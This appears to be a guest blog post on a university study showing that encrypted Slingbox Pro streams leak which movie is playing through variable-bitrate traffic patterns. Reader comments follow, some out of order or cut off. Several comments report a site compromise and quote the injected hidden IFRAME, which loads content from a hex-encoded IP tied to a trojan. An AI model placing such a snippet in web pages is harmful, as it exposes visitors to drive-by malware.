[Today’s guest blogger is Yoshi Kohno, a Computer Science prof at University of Washington who has done interesting work on security and privacy topics including e-voting. – Ed]
If you follow technology news, you might be aware of the buzz surrounding technologies that mate the Internet with your TV. The Slingbox Pro and the Apple TV are two commercial products leading this wave. The Slingbox Pro and the Apple TV system are a bit different, but the basic idea is that they can stream videos over a network. For example, you could hook the Slingbox Pro up to your DVD player or cable TV box, and then wirelessly watch a movie on any TV in your house (via the announced Sling Catcher). Or you could watch a movie or TV show on your laptop from across the world.
Privacy is important for these technologies. For example, you probably don’t want someone sniffing at your ISP to figure out that you’re watching a pirated copy of Spiderman 3 (of course, we don’t condone piracy). You might not want your neighbor, who likes to sniff 802.11 wireless packets, to be able to figure out what channel, movie, or type of movie you’re watching. You might not want your hotel to figure out what movie you’re watching on your laptop in order to send you targeted ads. The list goes on…
To address viewer privacy, the Slingbox Pro uses encryption. But does the use of encryption fully protect the privacy of a user’s viewing habits? We studied this question at the University of Washington, and we found that the answer to this questions is No – despite the use of encryption, a passive eavesdropper can still learn private information about what someone is watching via their Slingbox Pro.
The full details of our results are in our Usenix Security 2007 paper, but here are some of the highlights.
First, in order to conserve bandwidth, the Slingbox Pro uses something called variable bitrate (VBR) encoding. VBR is a standard approach for compressing streaming multimedia. At a very abstract level, the idea is to only transmit the differences between frames. This means that if a scene changes rapidly, the Slingbox Pro must still transmit a lot of data. But if the scene changes slowly, the Slingbox Pro will only have to transmit a small amount of data – a great bandwidth saver.
Now notice that different movies have different visual effects (e.g., some movies have frequent and rapid scene changes, others don’t). The use of VBR encodings therefore means that the amount data transmitted over time can serve as a fingerprint for a movie. And, since encryption alone won’t fully conceal the number of bytes transmitted, this fingerprint can survive encryption!
We experimented with fingerprinting encrypted Slingbox Pro movie transmissions in our lab. We took 26 of our favorite movies (we tried to pick movies from the same director, or multiple movies in a series), and we played them over our Slingbox Pro. Sometimes we streamed them to a laptop attached to a wired network, and sometimes we streamed them to a laptop connected to an 802.11 wireless network. In all cases the laptop was one hop away.
We trained our system on some of those traces. We then took new query traces for these movies and tried to match them to our database. For over half of the movies, we were able to correctly identify the movie over 98% of the time. This is well above the less than 4% accuracy that one would get by random chance.
What does all this mean? First and foremost, this research result provides further evidence that critical information can leak out through encrypted channels; see our paper for related work. In the case of encrypted streaming multimedia, one might wonder how our results scale since we only tested 26 movies. Addressing the scalability question for our new VBR-based fingerprinting approach is a subject of future research; but, as cryptanalysts like to say, attacks only get better. Moreover, if the makers of movies wanted to, they could potentially make the VBR fingerprints for their movies even stronger and more uniquely identifying.
(This note is not meant to criticize the makers of the Slingbox Pro. In fact, we were very pleased to learn that the Slingbox Pro uses encryption, which does raise the bar against a privacy attacker. Rather, this note describes new research results and fundamental challenges for privacy and streaming multimedia.)
I don’t think privacy has anything to do with the slingbox encryption. They did that to “protect” the content, otherwise the cable companies will sue them.
And perhaps the whole video is not encrypted. Only part of it may be. Because of the motion compensated nature of video, it may be possible for them to pass off with partial encryption.
Although I’m pleased to hear that Slingbox does use encryption (I just bought one myself), I think the guest blogger is missing the point. He raises a two examples of where one “might not want someone sniffing” your Slingbox VBR packets in order to determine your viewing habits, whether legal or not-so-legal, via “fingerprints” based on VBR encoding rates, but he totally ignores whether that would be the best method of determining _what_ you are watching on your slingbox (or any future multimedia-streaming devices).
First, I’d raise the point that if someone is _that_ interested in your viewing habits to the point they are going to your ISP to capture your packets, you’ve probably got bigger problems than whether you are watching a pirated copy of Spiderman 3. Whoever has that much resource to devote to find out your viewing habits probably could as easily bug your house, your computer, and/or the slingbox itself to determine what is being watched when, where, etc. The point being that a TLA that is devoting that much resource is not going to have to stoop to the level of capturing packets at the ISP level – there are much more less-intrusive and detectable methods of determining what the subject (that is you) is doing at any given time. Telescoping mics and binoculars would be a start. Going up the TLA chain (say, NSA or NRO level), they probably could tempest either your slingbox, ethernet cable, internet connection, or your laptop without even having to break the so-called “broken encryption”.
Second example with the “nosy neighbor” example is flawed as well. In order for the fingerprinting to work, one has to assume that the network-level transport has been broken (ie, no 802.11 encryption), in order to be able to determine whether the packet going “over the wire (air)” is originating from the slingbox. If that isn’t done, then how is the attacker able to determine what packet(s) to base the VBR-decryption routine? If you are connected to a “public hotspot” and streaming content (the point of whether that would violate the AUP of that hotspot notwithstanding), then you are, by conscience choice, making certain information avaiable “to the public”. If I’m _that_ concerned with making sure that people aren’t privy to my slingbox habits, then I’d probably just set up a VPN tunnel to my router and stream it that way.
I don’t doubt that the paper raises a valid point – except I think the point is a non-issue. Either you are being “tracked” by a TLA resulting in a bigger implication, or you are running on a unsecure network that, by definition, allows certain information (IP header, TCP/UDP header, packet size) to be “made public” in order to make this attack feasible.
–sf
TEL – VBR does help in this instance as the Slingbox buffers about 10 seconds of content IIRC.
So if you have a maximum uplink from the slingbox of 500kbps, and your VBR stream peaks out at 700K but averages
woops – comment got sent before I finished it. Darn cat and mouse 🙂
Some simple mitigations to the problem in the Slingbox are:
(1) allow other content to share the encrpyted channel – e.g. provide a “VPN” channel via the remaining bandwidth, or just allow multiple channels to be sent.
(2) Utilize the large buffer capacity in PC based video players (typically, you PC will handle video delivery time error more than x100 larger than you tv set-top-box) by smoothing the VBR down with a “leaky bucket” bandwidth regulator. This would require a larger buffer capacity in the Slingbox, so they might not like it.
(3) A variant of 2 — coarsly quantize the bitrate, e.g. send at 8 bitrates, switching every 0.25 second — would significantly lower the information content of the covert channel with almost no impact on buffer capacity
There’s been some discussion in the comments about VBR (variable bit rate) vs CBR (constant bit rate) security implications, and whether a device is “broken” if it can’t send CBR.
In the digital video distribution world (cable and satellite tv) VBR is often used to increase network channel density. The key idea is to multiplex multiple VBR channels together, trading off bandwith and latency among them to fill a CBR “pipe”. To do this well, you need to be capable of fully re-encoding all the video channels, but you can get about 25% bit-rate maleability with pretty simple techniques.
If Slin
What I want to know is what kind of crappy encryption scheme is Slingbox using that reveals fingerprints like this?
I searched through the paper, but could not find this information anywhere. I think it would be extremely relevant to mention the encryption that Slingbox uses.
A real encryption cipher should be indistinguishable from random data, which the slingbox bitstream most certainly is not, the pattern is OVERWHELMING if you can do a successful known-ciphertext attack that works 98% of the time.
It looks like some sort of weak stream cipher, and according to the tech news it seems implemented solely to break compatibility with third-party vendors and to keep content providers happy.
It had been planned all along, but no announcement was made to the customers until after a firmware upgrade. The whole thing smacks of DRM a lot more than it does ‘consumer privacy’.
Client-side buffering should avoid any perceptible delay in response to instructions to “pause” or “rewind” regardless. With enough buffer-ahead even “fast forward” can be accommodated. “Skip chapter”, “Jump to bookmark”, etc. will incur the delay, but it’s more acceptable with those. A lot of DVD players already seem to “think” for a bit when those are used, before the result appears; probably because the drive has to seek a completely different region of the disc. People already tolerate it there.
I still stand by my original statement that any device unable to deliver a stream into the network at CONSTANT bit rate is a broken device.
In some situations, there would be no objection to a five-second delay between the time that video is fed into one end of the “pipe” and when it comes out the other. In those situations, bandwidth-smoothing techniques may be useful in combination with VBR. In other situations, such delays would be considered unacceptable. There’s really not much room for bandwidth smoothing if the maximum allowable delay is e.g. 50ms.
There is a huge difference between sending video between nodes on a LAN segment, and sending video between continents. Someone who uses a LAN to distribute video and remote control signals throughout his home is apt to be rather annoyed if there’s even a half-second delay between when he pushes a remote control button and when he sees the response. When sending data over a single LAN segment, keeping the delay under 50ms should not be a particular problem. The sender should be able to sense traffic levels on the network segment and act accordingly. The sender should also generally be assume that any packet that is successfully transmitted will be successfully received.
Sending data over a wide-area network is an entirely different matter. The sender has no way of knowing how much traffic exists on intervening network links, nor does it have any way of knowing whether a packet will reach its destination. The sender can’t even discover within a reasonable length of time whether a packet has reached the destination.
One approach to handling VBR encoding which might sometimes be useful over a WAN, but which might also be considered “piggish”, would be to encode video with a variable amount of forward error correction. In the “simple” parts of the video, forward-error correction might allow the video to play smoothly even if a third of the packets get dropped while in normal parts, only a 5% drop rate would be recoverable. In the most complex parts, any dropped packet would cause a visible disruption on playback.
Obviously one implication is that site compromise is no longer just for kicks or making a political statement, and no longer necessarily is accompanied by obvious defacement.
Another is that it’s not just disreputable sites you should avoid with IE and Javascript and scan anything there downloaded. It is all sites.
VBR encoding is a useful technique but VBR streaming is completely useless.
The term that crops up in the literature is “Bandwidth Smoothing”, there’s an article from 1999 which you can download from here — http://citeseer.ist.psu.edu/rexford99smoothing.html
The above article talks about how to calculate optimal playback buffer at the client side and the resulting startup latency caused by filling the buffer. If the transmitter has a full copy of the movie then it can do an exhaustive analysis and produce an optimised buffer length and CONSTANT bit rate transmission bandwidth to result in perfect viewing. However, the slingbox does not have access to the entire movie in advance so the best it can do is make a guess.
In any case, when VBR is used as the encoding technique, transmission should always be CBR and a client-side buffer makes up the difference. While there is lots of scope for arguing about optimising buffer size, and startup latency… there is no reason to ever use VBR as a transmission technique. From the point of view of network traffic analysis, every stream should look like a CBR stream (regardless of the encoding). I still stand by my original statement that any device unable to deliver a stream into the network at CONSTANT bit rate is a broken device. The technology for implementing bandwidth smoothing buffers is at least 10 years old.
Ed: Sorry to hear you got haxored, what were the implications for anyone visiting the site and loading up the hostile code?
We’ve now learned that there was a problem at Dreamhost, our web hosting company. The badguys apparently broke in to Dreamhost and got access to many accounts.
You’re kidding. That’s a bit of a black eye for you — rather like a stealthy breakin at an alarm company or something.
There was an intrusion. We think the intruder exploited a bug in WordPress.
We did find the IFRAME on the site’s homepage as described above.
The hostile code has now been removed.
This is easy to settle. Perhaps a statement can be made as to whether the site was hacked and that code inserted, and that it has now been removed.
That code was at the bottom of the pages, immediately below the closing html tag.
Are you accusing Ed of something? Trying to hack your box?
I just examined the source of this page. The word “iframe” only occurs five times in the code — all of them in the text of your comments.
This IFRAME is also on the RSS page and breaks Sage RSS reader plugin for Firefox, because it is not valid XML.
try again:
*IFRAME src=’http://0xcb.0xdf.0×9e.0×0c/t’ width=’6′ height=’6′ style=’visibility: hidden;’*
*/IFRAME*
that code is as follows, asterisks replace the html brackets
IFRAME src=’http://0xcb.0xdf.0x9e.0x0c/t’ width=’6′ height=’6′ style=’visibility: hidden;’ /IFRAME
Something is a bit odd about this web page.
The following code appears on the pages:
which is triggering the MS warning about remote data services add on, and ths site it refers to (probably in Malaysia) appears to be associated with a new version of the Downloader Trojan.
Beeker: The easiest way to check whether the data is encrypted traffic or simply an obfuscated form of a codec is to check whether the data “look random”, i.e. that it has roughly an even number of on and off bits. Encryption, if designed and used correctly, makes data look random/unstructured. Obviously, given that the paper showed they were able to fingerprint movies it didn’t work perfectly, but I’m sure that if the movies were unencrypted they would very much look structured.
Dan: The paper’s introduction states that there is not a ‘Related Works’ section, but that they mention related work within each section. Probably the best approach, given that the paper covers three distinct topics. What was the reference you were wishing to share?
Tel: The reason VBR encoding works for media streaming is that they can tune it so that while they technically need to have the full bandwidth for any given movie, they actually have a very low probability of saturing the bandwidth at any given point in time.
Roland: Good point about the effect of shifting time within the media stream. As far the network conditions being ideal, I think the paper did a good job explaining why they made their assumptions, i.e. they imagined the use case being home media consumption which would only involve one network hop, and by incorporating both wired and wireless traces they accounted for the differences in network behavior. I’m sure that if someone wanted to extend the results they could perform more extensive tracing with more varied network conditions to create a more informative fingerprint.
Interesting study. Tel makes a very good point of VBR been unsuitable in some ways for streaming, the pipe must be able to handle the most bursty part of the movie. What is confusing here is that VBR is used generally to drive down the total size of the media (same is true for VBR mp3). However the data transmission of sequential VBR in real time gives the ability to fingerprint the movie.
However the protocol could be enhanced so that during the less data intensive part of the movie, data from the more intensive part of the movie, maybe many minutes away, can be downloaded and stored to be used later. This would require memory on the receiver side, but memory is only getting cheaper, even a 1GB flash would be more than enough. This could completely flatten the data stream so that it becomes unfingerprintable (further padding while not bandwidth friendly could take care of the rest). It also can take the edge of on transmitting the higher data rate portions of the movie.
However this all starts to fall apart if you move into a channel hopping mode and you may end up downloading frames for a program or movie you don’t end up watching.
The tests were apparently performed under ideal, or at least nearly-identical, network conditions, with constant streaming from the beginning of the video clips, or for the same portion(s). The ‘fingerprints’ are going to vary in terms of the end-to-end- network connections and the effect this has on the traffic characteristics, actions such as fast-forwarding, pausing, rewinding and so forth, as well as the section(s) of the video clip being viewed.
isn’t VBR variable bit rate here confused with progressive encoding ??
Tel, VBR does allow more effective network usage because drop outs and/or artifacts are acceptable a small part of the time. If you allow degradation of the visible image for 1 second per hour, you can cram in more movies/channels. Pushing 50% more channels through the same cables means 50% more income. VBR is big in the digital TV business.
Variable bitrate encoding does NOT save network bandwidth when doing media streaming.
If you think about it, suppose I want to lay a cable between two buildings such that it can handle “N” simultaneous movies. Each movie uses a peak bandwidth of “B” but VBR might reduce that to B/2 for 80% of the time. My cable still needs to carry N * B total bandwidth unless I want to start allowing random drop-outs for my viewers some percentage of the time. My bandwidth provisioning saves nothing whatoever.
The best I can do is find a way to sell the extra bandwidth that the VBR is not using and make sure I sell it for applications that don’t care about dropouts and retires (e.g. email, file backup, etc). In practice, this “backfill” bandwidth is pretty much impossible to sell in the current environment.
My conclusion is that any device using VBR for a media streaming purpose is fundamentally broken. Note that VBR does save you storage bits on your hard drive and it also saves you bandwidth if you are going to download the movie first, then watch it later (i.e. if the realtime streaming constraint is removed from the traffic).
That’s a slick bit of observation, and a fun set of results.
Have you considered the sort of matching algorithm used by Shazam for audio fingerprinting/matching? It seems natural for the problem. A good (if a little hand-wavey) introduction can be found in Wang’s “An Industrial Strength Audio Search Algorithm,” presented at ISMIR 2003. The real content starts about halfway through, if memory serves.
Could this technique be used to create the ever-ellusive “unremovable fingerprint” that content protection companies are always trying to find?
Would it work the same for a TV show that the user paused, used FF, rewind, etc. I would think the fingerprint would change with those variables.. Or even if the user paused randomly during the movie playback..
Yoshi–does the conference version have a “related work” section? If so, I’ve got a reference for you to add…
It’s not clear to me that this attack will get better with a wider range of movies to choose from — as with gene-matching you’ll probably find subpopulations with fingerprints more similar than a simple statistical model would suggest. (And as the sampling period approaches the length of the whole movie, you’d kinda expect to get very high accuracy.) It’ seems likely, though, that VBR fingerprints will be enough to identify the genre of movie being watched, and VBR patterns might even join average shot length as a quick quantitative measure of a movie’s pacing and visual style. Knowing any distinguishing characteristic would be sufficient for targeted ads.
At first glance it appears that pretty much all the methods for disguising VBR fingerprints involve either additional bandwidth or increased latency for the same image quality. In which environments will this be a problem?
How do you know the stream really is encrypted, and not just scrambled a bit? Let me throw up a hypothesis: The Slingbox stream is not really encrypted, they just changed something in the codec to make it incompatible with standard asf streams.
To quote more from the introduction of the paper:
“We test this algorithm on a dataset consisting of over 100 hours of network throughput data. With only 10 minutes worth of monitoring data, we are able to predict with 62% accuracy the movie that is being watched (on average over all movies); this compares favorably with the less than 4% accuracy that one would achieve by random chance. With 40 minutes worth of monitoring data, we are able to predict the movie with 77% accuracy. For certain movies we can do significantly better; for 15 out of the 26 movies, given a 40 minute trace we are able to predict the correct movie with over 98% accuracy….”
Further details of the experiments are in Section 2.3 of the paper.
Well, it’s true that once the fingerprint is established, you have something similar to a known plaintext attack. Granted, you still have to ‘crack’ both the encryption and the VBR codec at the same time, and the VBR codec is almost certainly lossy, so it’s not as close to being broken as you might think.
That said, this is fundamentally a form of traffic analysis, of being able to glean information based on whether or not something is being transmitted as opposed to the actual data being transmitted. The basic concepts have been known for many years now, and I believe are described in the rainbow series of books.
One method of correcting this is to send random data to fill in the space where nothing is being transmitted; that’s used for military systems. For this sort of system, it would be better to just accept higher latency in the data stream and average out the data flow by delaying data during high bit rate portions of the stream.
Interesting way to attack the scheme. Nitpick though: for half the movies you guessed 98% right? 1/13 =~ .075. Did you attack each movie stream multiple times? If so, how much data did you need to collect before an identification was possible? And how bout the other 13 movies?
I just saw that and immediately “60% of the time, it works every time” popped into my head =).
I am not by any means a security expert, but it seems once the “finger print” is established, the encryption itself will soon be broken.
The US in WWII was able to break the Japanese code by transmitting fake unique messages and correctly linking them to intercepted Japanese radio transmissions.